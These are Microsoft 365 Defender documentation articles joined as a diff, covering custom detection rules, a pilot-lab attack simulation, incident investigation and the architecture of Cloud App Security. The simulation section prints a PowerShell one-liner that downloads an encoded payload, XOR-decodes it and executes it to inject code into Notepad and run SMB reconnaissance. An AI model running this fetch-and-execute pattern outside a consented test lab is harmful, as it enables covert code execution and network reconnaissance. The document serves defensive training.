+Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
+
+Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
+
+1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
+
+ ![Example of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
+
+ > [!NOTE]
+ > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
+
+2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
+
+ ![Example of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
+
+ Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
+
+3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
+
+ ![Example of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
+
+4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
+
+ ![Example of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
+
+5. Select the scope for the alert rule. Since this query involves devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
+
+ ![Example of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
+
+ For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
+
+6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
+
+ ![Example of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
+
+ ![Example of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
+
+ From this page, you can select the detection rule, which will open a details page.
+
+ ![Example of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
+
+<!--
+
+### Advanced hunting walk-through exercises
+
+To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities, and create custom detections and remediation actions.
+
+> [!NOTE]
+> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
+
+|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
+||||||
+|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
+|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
+|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
+|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
+|
+
+-->
+
+### Expert training on advanced hunting
+
+**Tracking the adversary** is a webcast series for new security analysts and seasoned threat hunters. It guides you through the basics of advanced hunting all the way to creating your own sophisticated queries.
+
+See [Get expert training on advanced hunting](advanced-hunting-expert-training.md) to get started.
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Investigate Respond Simulate Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-simulate-attack.md
+
+ Title: Run an attack simulation in a Microsoft 365 Defender pilot environment, isolated environment for attack simulation, response, remediation
+description: Run attack simulations for Microsoft 365 Defender to see how how alerts and incidents are presented, insights are gained, and threats are quickly remediated.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-scenario
+ - m365solution-pilotmtpproject
+
+ms.technology: m365d
++
+# Run an attack simulation in a Microsoft 365 Defender pilot environment
++
+This article is [Step 1 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft 365 Defender using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
+
+After preparing your [pilot environment](eval-defender-investigate-respond.md), it's time to test Microsoft 365 Defender's incident response and automated investigation and remediation capabilities by creating an incident with a simulated attack and using the Microsoft 365 Defender portal to investigate and respond.
+
+An incident in Microsoft 365 Defender is a collection of correlated alerts and associated data that make up the story of an attack.
+
+Microsoft 365 services and apps create alerts when they detect a suspicious or malicious event or activity. Individual alerts provide valuable clues about a completed or ongoing attack. However, attacks typically employ various techniques against different types of entities, such as devices, users, and mailboxes. The result is multiple alerts for multiple entities in your tenant.
+
+>[!Note]
+>If you are brand new to security analysis and incident response, see the [Respond to your first incident walkthrough](first-incident-overview.md) to get a guided tour of a typical process of analysis, remediation, and post-incident review.
+>
+
+## Simulate attacks with the Microsoft 365 Defender portal
+
+The Microsoft 365 Defender portal has built-in capabilities to create simulated attacks on your pilot environment:
+
+- Attack simulation training for Microsoft 365 Defender for Office 365 at [https://security.microsoft.com/attacksimulator](https://security.microsoft.com/attacksimulator).
+
+ In the Microsoft 365 Defender portal, select **Email & collaboration > Attack simulation training**.
+
+- Attack tutorials & simulations for Microsoft 365 Defender for Endpoints at [https://security.microsoft.com/tutorials/simulations](https://security.microsoft.com/tutorials/simulations).
+
+ In the Microsoft 365 Defender portal, select **Endpoints > Tutorials & simulations**.
+
+### Defender for Office 365 Attack simulation training
+
+Defender for Office 365 with Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 includes attack simulation training for phishing attacks. The basic steps are:
+
+1. Create a simulation
+
+ For step by step instructions on how to create and send a new simulation, see [Simulate a phishing attack](/microsoft-365/security/office-365-security/attack-simulation-training).
+
+2. Create a payload
+
+ For step by step instructions on how to create a payload for use within a simulation, see [Create a custom payload for Attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-payloads).
+
+3. Gaining insights
+
+ For step by step instructions on how to gain insights with reporting, see [Gain insights through Attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-insights).
+
+For more information, see [Simulations](/microsoft-365/security/office-365-security/attack-simulation-training-get-started#simulations).
+
+### Defender for Endpoint attack tutorials & simulations
+
+Here are the Defender for Endpoint simulations from Microsoft:
+
+- Document drops backdoor
+- Automated investigation (backdoor)
+
+There are additional simulations from Attack IQ and SafeBreach. There are also a set of tutorials.
+
+For each simulation or tutorial:
+
+1. Download and read the corresponding walk through document provided with your selected simulation or scenario.
+
+2. Download the simulation file. You can choose to download the file or script on the test device but it's not mandatory.
+
+3. Run the simulation file or script on the test device as instructed in the walk through document.
+
+ For more information, see [Experience Microsoft Defender for Endpoint through simulated attack](/microsoft-365/security/defender-endpoint/attack-simulations).
+
+## Simulate an attack with an isolated domain controller and client device (optional)
+
+In this optional incident response exercise, you'll simulate an attack on an isolated Active Directory Domain Services (AD DS) domain controller and Windows 10 device using a PowerShell script and then investigate, remediate, and resolve the incident.
+
+First, you need to add endpoints to your pilot environment.
+
+### Add pilot environment endpoints
+
+First, you need to add an isolated AD DS domain controller and a Windows 10 device to your pilot environment.
+
+1. Verify your pilot environment tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
+
+2. Verify that your domain controller:
+
+ - Runs Windows Server 2008 R2 or a later version.
+ - Reports to [Microsoft Defender for Identity](/azure/security-center/security-center-wdatp) and has enabled [remote management](/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
+ - Has [Microsoft Defender for Identity and Microsoft Cloud App Security integration](/cloud-app-security/mdi-integration) enabled.
+ - Has a test user is created in the test domain. Administrator-level permissions are not needed.
+
+3. Verify that your test device:
+
+ - Runs Windows 10 version 1903 or a later version.
+ - Is joined to the AD DS domain controller domain.
+ - Has [Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features) enabled. If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+ - Is [onboarded to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+If you use tenant and device groups, create a dedicated device group for the test device and push it to top level.
+
+One alternative is to host your AD DS domain controller and test device as virtual machines in Microsoft Azure infrastructure services. You can use the instructions in [Phase 1 of the simulated enterprise Test Lab Guide](/microsoft-365/enterprise/simulated-ent-base-configuration-microsoft-365-enterprise#phase-1-create-a-simulated-intranet), but skip the creation of the APP1 virtual machine.
+
+Here is the result.
+
+![Endpoints for your Defender evaluation environment using the simulated enterprise Test Lab Guide](../../media/eval-defender-investigate-respond/eval-defender-eval-investigate-respond-endpoints-tlg.png)
+
+You'll simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's device and they occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution. Such behavior allows them to evade detection and persist on the device.
+
+In this simulation, our sample scenario starts with a PowerShell script. In the real world, a user might be tricked into running a script or the script might run from a remote connection to another computer from a previously infected device, which indicates that the attacker is attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.
+
+![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
+
+During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
+
+> [!IMPORTANT]
+> For optimum results, follow the attack simulation instructions as closely as possible.
+
+### Run the isolated AD DS domain controller attack simulation
+
+To run the attack scenario simulation:
+
+1. Ensure that your pilot environment includes the isolated AD DS domain controller and Windows 10 device.
+
+2. Sign in to the test device with the test user account.
+
+3. Open a Windows PowerShell window on the test device.
+
+4. Copy the following simulation script:
+
+ ```powershell
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
+ = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
+ -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+ $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
+ $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
+ ```
+
+ > [!NOTE]
+ > If you open this article on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. If this is the case, download this document and open it on Adobe Reader.
+
+5. Paste and run the copied script in the PowerShell window.
+
+> [!NOTE]
+> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
+
+A few seconds later, the Notepad app will open. A simulated attack code will be injected into Notepad. Keep the automatically generated Notepad instance open to experience the full scenario.
+
+The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.
+
+You'll see this message displayed on the PowerShell console when this script completes:
+
+```console
+ran NetSessionEnum against [DC Name] with return code result 0
+```
+
+To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process.
+
+### Investigate the incident for the simulated attack
+
+> [!NOTE]
+> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
+
+Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Defender portal.
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Incidents & Alerts > Incidents**.
+
+3. The new incident for the simulated attack will appear in the incident queue.
+
+ ![Example of the incident queue](../../media/mtp/fig2.png)
+
+#### Investigate the attack as a single incident
+
+Microsoft 365 Defender correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. By doing so, Microsoft 365 Defender shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.
+
+The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.
+
+To view the incident:
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Incidents & Alerts > Incidents**.
+
+3. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
+
+ The alerts that are shown in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
+
+3. Select **Open incident page** to get more information about the incident.
+
+ In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (such as Microsoft Defender for Identity or Microsoft Defender for Endpoint), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
+
+ You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
+
+#### Review generated alerts
+
+Let's look at some of the alerts generated during the simulated attack.
+
+> [!NOTE]
+> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
+
+![Example of the generated alerts](../../media/mtp/fig6.png)
+
+##### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint)
+
+Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.
+
+To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
+
+![Example of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
+
+##### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint)
+
+Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
+
+We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. These anomalous behaviors often indicate that extraneous code was introduced and is running in an otherwise trusted process.
+
+For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
+
+> [!NOTE]
+> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
+
+Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation.
+
+Select the IP address in the alert process tree to view the IP address details page.
+
+![Example of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
+
+The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree).
+
+![Example of the IP address details page](../../media/mtp/fig9.png)
+
+##### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
+
+Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.
+
+In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
+
+![Example of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
+
+#### Review the device timeline with Microsoft Defender for Endpoint
+
+After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.
+
+Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events.
+
+Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
+
+![Example of the device timeline with behaviors](../../media/mtp/fig11.png)
+
+Expanding some of the more interesting behaviors provides useful details, such as process trees.
+
+For example, scroll down until you find the alert event **Suspicious process injection observed**. Select the **powershell.exe injected to notepad.exe process** event below it, to display the full process tree for this behavior under the **Event entities** graph on the side pane. Use the search bar for filtering if necessary.
+
+![Example of the process tree for selected PowerShell file creation behavior](../../media/mtp/fig12.png)
+
+#### Review the user information with Microsoft Cloud App Security
+
+On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
+
+Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](/cloud-app-security/tutorial-ueba#identify).
+
+![Example of Cloud App Security user page](../../media/mtp/fig13.png)
+
+#### Automated investigation and remediation
+
+> [!NOTE]
+>Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
+
+> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
+
+Navigate back to the incident in the Microsoft 365 Defender portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.
+
+![Example of the automated investigations related to the incident](../../media/mtp/fig14.png)
+
+Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
+
+- Alert(s) that triggered the automated investigation.
+- Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well.
+- List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious.
+- Threats found. Known threats that are found during the investigation.
+
+> [!NOTE]
+> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
+
+![Example of the Investigation details page](../../media/mtp/fig15.png)
+
+During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
+
+You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
+
+#### Resolve the incident
+
+After the investigation is complete and confirmed to be remediated, you resolve the incident.
+
+From the **Incident** page, select **Manage incident**. Set the status to **Resolve incident** and select **True alert** for the classification and **Security testing** for the determination.
+
+![Example of the the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
+
+When the incident is resolved, it resolves all of the associated alerts in Microsoft 365 Defender portal and in the related portals.
+
+This wraps up the attack simulation for incident analysis, automated investigation, and incident resolution.
+
+## Next step
+
+[![Try Microsoft 365 Defender incident response capabilities](../../medi)
+
+Step 2 of 2: [Try Microsoft 365 Defender incident response capabilities](eval-defender-investigate-respond-additional.md)
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Investigate Respond https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond.md
+
+ Title: Investigate and respond using Microsoft 365 Defender in a pilot environment, and use Attack Simulator, teach users to detect, investigate attack surfaces, and strengthen your security posture
+description: Set up attack simulations in Microsoft 365 Defender trial lab or pilot environment to try out the security solution designed to teach users to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
++ Last updated : 07/09/2021+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Investigate and respond using Microsoft 365 Defender in a pilot environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to create incidents with attack simulations and tutorials and use Microsoft 365 Defender to investigate and respond. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+
+Use the following steps.
+
+![Steps for performing simulated incident response in the Microsoft 365 Defender evaluation environment](../../media/eval-defender-investigate-respond/eval-defender-eval-investigate-respond-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Simulate attacks](eval-defender-investigate-respond-simulate-attack.md) | Simulate attacks on your evaluation environment and use the Microsoft 365 Defender portal to perform incident response. |
+|2|[Try incident response capabilities ](eval-defender-investigate-respond-additional.md) | Try features and capabilities in Microsoft 365 Defender. |
+||||
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Mcas Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-architecture.md
+
+ Title: Review architecture requirements and the structure for Microsoft Cloud App Security, plan the configuration and design by knowing the framework of Cloud App Security in Microsoft 365 Defender
+description: Microsoft Cloud App Security technical diagrams explain the architecture in Microsoft 365 Defender, which will help you build a pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review architecture requirements and key concepts for Microsoft Cloud App Security
++
+**Applies to:**
+
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security alongside Microsoft 365 Defender. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Before enabling Microsoft Cloud App Security, be sure you understand the architecture and can meet the requirements.
+
+## Understand the architecture
+
+Microsoft Cloud App Security is a Cloud Access Security Broker (CASB). CASBs act a gatekeeper to broker access in real time between your enterprise users and cloud resources they use, wherever your users are located and regardless of the device they are using. Microsoft Cloud App Security natively integrates with Microsoft security capabilities, including Microsoft 365 Defender.
+
+Without Cloud App Security, cloud apps that are used by your organization are unmanaged and unprotected, as illustrated.
+
+![Architecture for Microsoft Cloud App Security](../../media/defender/m365-defender-mcas-architecture-a.png)
+
+In the illustration:
+- The use of cloud apps by an organization is unmonitored and unprotected.
+- This use falls outside the protections achieved within a managed organization.
+
+#### Discovering cloud apps
+
+The first step to managing the use of cloud apps is to discover which cloud apps are used by your organization. This next diagram illustrates how cloud discovery works with Cloud App Security.
+
+![Architecture for Microsoft Cloud App Security - Cloud discovery](../../media/defender/m365-defender-mcas-architecture-b.png)
+
+In this illustration, there are two methods that can be used to monitor network traffic and discover cloud apps that are being used by your organization.
+- A. Cloud App Discovery integrates with Microsoft Defender for Endpoint natively. Defender for Endpoint reports cloud apps and services being accessed from IT-managed Windows 10 devices.
+- B. For coverage on all devices connected to a network, the Cloud App Security log collector is installed on firewalls and other proxies to collect data from endpoints. This data is sent to Cloud App Security for analysis.
+
+#### Managing cloud apps
+
+After you discover cloud apps and analyze the behavior of how these are used by your organization, you can begin managing cloud apps that you choose.
+
+![Architecture for Microsoft Cloud App Security - Managing cloud apps](../../media/defender/m365-defender-mcas-architecture-c.png)
+
+In this illustration:
+- Some apps are sanctioned for use. This is a simple way of beginning to manage apps.
+- You can enable greater visibility and control by connecting apps with app connectors. App connectors use the APIs of app providers.
++
+#### Applying session controls to cloud apps
+
+Microsoft Cloud App Security serves as a reverse proxy, providing proxy access to sanctioned cloud apps. This allows Cloud App Security to apply session controls that you configure.
+
+![Architecture for Microsoft Cloud App Security - Proxy access session control](../../media/defender/m365-defender-mcas-architecture-d.png)
+
+In this illustration:
+- Access to sanctioned cloud apps from users and devices in your organization is routed through Cloud App Security.
+- This proxy access allows session controls to be applied.
+- Cloud apps that you have not sanctioned or explicitly unsanctioned are not affected.
+
+Session controls allow you to apply parameters to how cloud apps are used by your organization. For example, if your organization is using Salesforce, you can configure a session policy that allows only managed devices to access your organization's data in Salesforce. A simpler example could be configuring a policy to monitor traffic from unmanaged devices so you can analyze the risk of this traffic before applying stricter policies.
+
+#### Integrating with Azure AD with Conditional Access App Control
+
+You might already have SaaS apps added to your Azure AD tenant to enforce multi-factor authentication and other conditional access policies. Microsoft Cloud App Security natively integrates with Azure AD. All you have to do is configure a policy in Azure AD to use Conditional Access App Control in Cloud App Security. This routes network traffic for these managed SaaS apps through Cloud App Security as a proxy, which allows Cloud App Security to monitor this traffic and to apply session controls.
+
+![Architecture for Microsoft Cloud App Security - SaaS apps](../../media/defender/m365-defender-mcas-architecture-e.png)
+
+In this illustration:
+- SaaS apps are integrated with the Azure AD tenant. This allows Azure AD to enforce conditional access policies, including multi-factor authentication.
+- A policy is added to Azure Active Directory to direct traffic for SaaS apps to Cloud App Security. The policy specifies which SaaS apps to apply this policy to. Consequently, after Azure AD enforces any conditional access policies that apply to these SaaS apps, Azure AD then directs (proxies) the session traffic through Cloud App Security.
+- Cloud App Security monitors this traffic and applies any session control policies that have been configured by administrators.
+
+You might have discovered and sanctioned cloud apps using Cloud App Security that have not been added to Azure AD. You can take advantage of Conditional Access App Control by adding these cloud apps to your Azure AD tenant and the scope of your conditional access rules.
+
+#### Protecting your organization from hackers
+
+Cloud App Security provides powerful protection on its own. However, when combined with the other capabilities of Microsoft 365 Defender, Cloud App Security provides data into the shared signals which, together, helps stop attacks.
+
+It's worth repeating this illustration from the overview to this Microsoft 365 Defender evaluation and pilot guide.
+
+![How Microsoft 365 Defender stops a chain of threats](../../media/defender/m365-defender-eval-threat-chain.png)
+
+Focusing on the right side of this illustration, Microsoft Cloud App Security notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these to the security team. Consequently, Cloud App Security helps prevent lateral movement by hackers and exfiltration of sensitive data. Microsoft 356 Defender correlates the signals from all the components to provide the full attack story.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Cloud App Security.
++
+|Concept |Description |More information |
+||||
+| Cloud App Security Dashboard | Presents an overview of the most important information about your organization and gives links to deeper investigation. | [Working with the dashboard ](/cloud-app-security/daily-activities-to-protect-your-cloud-environment) |
+| Conditional Access App Control | Reverse proxy architecture that integrates with your Identity Provider (IdP) to give Azure AD conditional access policies and selectively enforce session controls. | [Protect apps with Microsoft Cloud App Security Conditional Access App Control](/cloud-app-security/proxy-intro-aad) |
+| Cloud App Catalog | The Cloud App Catalog gives you a full picture against Microsoft catalog of over 16,000 cloud apps that are ranked and scored based on more than 80 risk factors. | [Working with App risk scores](/cloud-app-security/risk-score) |
+| Cloud Discovery Dashboard | Cloud Discovery analyzes your traffic logs and is designed to give more insight into how cloud apps are being used in your organization as well as give alerts and risk levels. | [Working with discovered apps ](/cloud-app-security/discovered-apps) |
+|Connected Apps |Cloud App Security provides end-to-end protection for connected apps using Cloud-to-Cloud integration, API connectors, and real-time access and session controls leveraging our Conditional App Access Controls. |[Protecting connected apps](/cloud-app-security/protect-connected-apps) |
+| | | |
+
+## Review architecture requirements
+
+### Discovering cloud apps
+
+To discover cloud apps used in your environment, you can do one or both of the following:
+
+- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 10 devices, on and off your network.
+- To discover all cloud apps accessed by all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies. This collects data from your endpoints and sends it to Cloud App Security for analysis. Cloud App Security natively integrates with some third-party proxies for even more capabilities.
+
+These options are included in [Step 2. Enable the evaluation environment](eval-defender-mcas-enable-eval.md).
+
+### Applying Azure AD Conditional Access policies to cloud apps
+
